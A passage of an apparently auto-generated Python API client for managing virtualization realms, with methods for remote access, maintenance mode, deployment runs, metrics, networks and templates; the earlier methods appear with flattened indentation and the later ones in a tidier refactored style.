>>> thread = api.disable_virt_realm_remote_access_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method disable_virt_realm_remote_access" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `disable_virt_realm_remote_access`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/remoteaccess', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def enable_maintence_mode1(self, id, **kwargs): # noqa: E501
"""Update Maintenance Mode # noqa: E501
Updates the maintenance status for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_maintence_mode1(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param bool enable: Enable or disable maintenance mode
:param MaintenanceModeRequest maintenance_mode_request: The maintenance mode request, when enabling maintenance mode
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.enable_maintence_mode1_with_http_info(id, **kwargs) # noqa: E501
def enable_maintence_mode1_with_http_info(self, id, **kwargs): # noqa: E501
"""Update Maintenance Mode # noqa: E501
Updates the maintenance status for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_maintence_mode1_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param bool enable: Enable or disable maintenance mode
:param MaintenanceModeRequest maintenance_mode_request: The maintenance mode request, when enabling maintenance mode
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'enable', 'maintenance_mode_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method enable_maintence_mode1" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `enable_maintence_mode1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'enable' in local_var_params and local_var_params['enable'] is not None: # noqa: E501
query_params.append(('enable', local_var_params['enable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'maintenance_mode_request' in local_var_params:
body_params = local_var_params['maintenance_mode_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/maintenance', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def enable_virt_realm_remote_access(self, id, **kwargs): # noqa: E501
"""Enable Remote Access # noqa: E501
Enables Remote Access for a single Virtualization Realm by the given ID.<br> <br> To do so, Remote Access must be configured for the Virtualization Realm.<br> <br> If no instanceType is provided, the Instance Type will first attempt to use the value from the Virtualization Realm's Remote Access config. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_virt_realm_remote_access(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str instance_type: Remote access server instance type
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.enable_virt_realm_remote_access_with_http_info(id, **kwargs) # noqa: E501
def enable_virt_realm_remote_access_with_http_info(self, id, **kwargs): # noqa: E501
"""Enable Remote Access # noqa: E501
Enables Remote Access for a single Virtualization Realm by the given ID.<br> <br> To do so, Remote Access must be configured for the Virtualization Realm.<br> <br> If no instanceType is provided, the Instance Type will first attempt to use the value from the Virtualization Realm's Remote Access config. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_virt_realm_remote_access_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str instance_type: Remote access server instance type
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'instance_type'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method enable_virt_realm_remote_access" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `enable_virt_realm_remote_access`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'instance_type' in local_var_params and local_var_params['instance_type'] is not None: # noqa: E501
query_params.append(('instanceType', local_var_params['instance_type'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/remoteaccess', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_runs_in_virtualization_realm(self, id, search_type, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the Deployment Runs launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs_in_virtualization_realm(id, search_type, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str search_type: Deployment run status type (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalDeploymentRun]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_runs_in_virtualization_realm_with_http_info(id, search_type, **kwargs) # noqa: E501
def get_deployment_runs_in_virtualization_realm_with_http_info(self, id, search_type, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the Deployment Runs launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs_in_virtualization_realm_with_http_info(id, search_type, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str search_type: Deployment run status type (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalDeploymentRun], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'search_type', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_runs_in_virtualization_realm" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployment_runs_in_virtualization_realm`") # noqa: E501
# verify the required parameter 'search_type' is set
if self.api_client.client_side_validation and ('search_type' not in local_var_params or # noqa: E501
local_var_params['search_type'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_type` when calling `get_deployment_runs_in_virtualization_realm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'search_type' in local_var_params and local_var_params['search_type'] is not None: # noqa: E501
query_params.append(('search_type', local_var_params['search_type'])) # noqa: E501
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/deploymentruns', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalDeploymentRun]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host_configuration_metrics1(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Metrics # noqa: E501
Returns metric data for Deployment Runs launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_configuration_metrics1(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_configuration_metrics1_with_http_info(id, start, end, **kwargs) # noqa: E501
def get_host_configuration_metrics1_with_http_info(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Metrics # noqa: E501
Returns metric data for Deployment Runs launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_configuration_metrics1_with_http_info(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'start', 'end', 'interval', 'interval_unit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host_configuration_metrics1" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host_configuration_metrics1`") # noqa: E501
# verify the required parameter 'start' is set
if self.api_client.client_side_validation and ('start' not in local_var_params or # noqa: E501
local_var_params['start'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `start` when calling `get_host_configuration_metrics1`") # noqa: E501
# verify the required parameter 'end' is set
if self.api_client.client_side_validation and ('end' not in local_var_params or # noqa: E501
local_var_params['end'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `end` when calling `get_host_configuration_metrics1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'start' in local_var_params and local_var_params['start'] is not None: # noqa: E501
query_params.append(('start', local_var_params['start'])) # noqa: E501
if 'end' in local_var_params and local_var_params['end'] is not None: # noqa: E501
query_params.append(('end', local_var_params['end'])) # noqa: E501
if 'interval' in local_var_params and local_var_params['interval'] is not None: # noqa: E501
query_params.append(('interval', local_var_params['interval'])) # noqa: E501
if 'interval_unit' in local_var_params and local_var_params['interval_unit'] is not None: # noqa: E501
query_params.append(('intervalUnit', local_var_params['interval_unit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/metrics/hostconfiguration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_network(self, id, network_id, **kwargs): # noqa: E501
"""Retrieve Network # noqa: E501
Returns a single Network in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_network(id, network_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int network_id: ID of network (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Network
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_network_with_http_info(id, network_id, **kwargs) # noqa: E501
def get_network_with_http_info(self, id, network_id, **kwargs): # noqa: E501
"""Retrieve Network # noqa: E501
Returns a single Network in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_network_with_http_info(id, network_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int network_id: ID of network (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Network, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'network_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_network" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_network`") # noqa: E501
# verify the required parameter 'network_id' is set
if self.api_client.client_side_validation and ('network_id' not in local_var_params or # noqa: E501
local_var_params['network_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `network_id` when calling `get_network`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'network_id' in local_var_params:
path_params['networkId'] = local_var_params['network_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks/{networkId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Network', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_networks(self, id, **kwargs):  # noqa: E501
    """List Networks  # noqa: E501

    Returns a collection of the Networks in the specified Virtualization
    Realm.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_networks(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: list[MinimalNetwork]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force data-only responses; the *_with_http_info variant returns the
    # full (data, status, headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_networks_with_http_info(id, **forwarded)  # noqa: E501
def get_networks_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Networks  # noqa: E501

    Returns a collection of the Networks in the specified Virtualization
    Realm.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_networks_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: tuple(list[MinimalNetwork], status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Reject any keyword argument that is not part of the API contract.
    for param_name, param_value in local_var_params.pop('kwargs').items():
        if param_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_networks" % param_name
            )
        local_var_params[param_name] = param_value

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        for required in ('id',):
            if local_var_params.get(required) is None:
                raise ApiValueError(
                    "Missing the required parameter `%s` when calling "
                    "`get_networks`" % required
                )

    collection_formats = {}

    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/networks', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[MinimalNetwork]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_template_subscription(self, id, subscription_id, **kwargs):  # noqa: E501
    """Retrieve Template Subscription  # noqa: E501

    Returns a single Template Subscription in the specified Virtualization
    Realm.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_template_subscription(id, subscription_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param int subscription_id: ID of template subscription (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: FullTemplateSubscription
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force data-only responses; the *_with_http_info variant returns the
    # full (data, status, headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_template_subscription_with_http_info(id, subscription_id, **forwarded)  # noqa: E501
def get_template_subscription_with_http_info(self, id, subscription_id, **kwargs):  # noqa: E501
    """Retrieve Template Subscription  # noqa: E501

    Returns a single Template Subscription in the specified Virtualization
    Realm.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_template_subscription_with_http_info(id, subscription_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param int subscription_id: ID of template subscription (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: tuple(FullTemplateSubscription, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'id',
        'subscription_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Reject any keyword argument that is not part of the API contract.
    for param_name, param_value in local_var_params.pop('kwargs').items():
        if param_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_template_subscription" % param_name
            )
        local_var_params[param_name] = param_value

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        for required in ('id', 'subscription_id'):
            if local_var_params.get(required) is None:
                raise ApiValueError(
                    "Missing the required parameter `%s` when calling "
                    "`get_template_subscription`" % required
                )

    collection_formats = {}

    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501
    if 'subscription_id' in local_var_params:
        path_params['subscription_id'] = local_var_params['subscription_id']  # noqa: E501

    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/subscriptions/{subscription_id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='FullTemplateSubscription',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_templates_in_virtualization_realm(self, id, **kwargs):  # noqa: E501
    """List Templates  # noqa: E501

    Returns a collection of the Templates in the specified Virtualization
    Realm.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_templates_in_virtualization_realm(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param bool include_registrations: Include templates registered to the virtualization realm
    :param bool include_subscriptions: Include templates subscribed to by the virtualization realm
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: list[MinimalCons3rtTemplateData]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force data-only responses; the *_with_http_info variant returns the
    # full (data, status, headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_templates_in_virtualization_realm_with_http_info(id, **forwarded)  # noqa: E501
def get_templates_in_virtualization_realm_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Templates  # noqa: E501

    Returns a collection of the Templates in the specified Virtualization
    Realm.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_templates_in_virtualization_realm_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param bool include_registrations: Include templates registered to the virtualization realm
    :param bool include_subscriptions: Include templates subscribed to by the virtualization realm
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: tuple(list[MinimalCons3rtTemplateData], status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'id',
        'include_registrations',
        'include_subscriptions',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Reject any keyword argument that is not part of the API contract.
    for param_name, param_value in local_var_params.pop('kwargs').items():
        if param_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_templates_in_virtualization_realm" % param_name
            )
        local_var_params[param_name] = param_value

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        for required in ('id',):
            if local_var_params.get(required) is None:
                raise ApiValueError(
                    "Missing the required parameter `%s` when calling "
                    "`get_templates_in_virtualization_realm`" % required
                )

    collection_formats = {}

    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    # Optional filters are forwarded as query parameters only when supplied.
    query_params = []
    for attr_name, query_name in (('include_registrations', 'include_registrations'),
